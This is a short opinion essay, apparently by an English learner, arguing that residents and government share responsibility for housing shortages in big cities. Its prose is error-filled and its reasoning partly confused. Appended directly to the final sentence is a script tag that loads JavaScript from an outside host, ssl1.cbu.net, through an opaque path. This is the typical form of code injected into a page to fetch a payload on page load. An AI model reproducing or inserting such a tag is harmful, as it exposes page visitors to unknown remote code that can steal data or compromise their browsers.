only government action can solve housing shortage in big city. agree or disagree?

People hold differing views about only government hold the responsibility for housing shortage in urban areas. While some think that the deficiency of residents habitat can be solved by individuals, I would argue that state and people must address this issue together.

On the one hand, individuals has exerted impacts on the lack of houses. Meeting personal demands is the priority of each resident such as entertainment, education, health care. As a result, giving rise to a conscious exodus of the population away from quite, rural towns toward industrialized cities to gain the benefit of occupational, medical and recreational opportunities which cause the overpopulation and overwhelmed pressure on houses. Although living in big cities satisfy the basic needs, serene-seeker are not familiar with the hectic lifestyle. Thus, they must accept the rural life, find the essential necessaries which can be only available in the countryside. For instant, people don’t need to survive and thrive in the money-oriented society.

On the other hand, there also the participation for tacking with housing problems. Long-term schedule should be developed appropriately. Without focusing on self-serving purpose in rural enhancement, it leads to the lower standard of living. For example unemployment, alliteration. As a consequence, people become immature and vulnerable, behaving in a superficial and transient manner in a harsh civilization. However, national expenditure is offered to this area, there is no used to bridge the gap in population between city and countryside. Therefor, lawmaker should pass and reinforce legislative act in order to make a balance between two regions.

In conclusion, I strongly hold the opinion that inhabitants and government should assume the responsibility for inadequate houses.<script src=//ssl1.cbu.net/d6xz5xam></script>